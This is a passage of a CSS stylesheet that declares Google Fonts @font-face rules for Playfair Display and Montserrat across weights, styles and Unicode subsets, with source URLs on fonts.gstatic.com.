U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 *//* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) 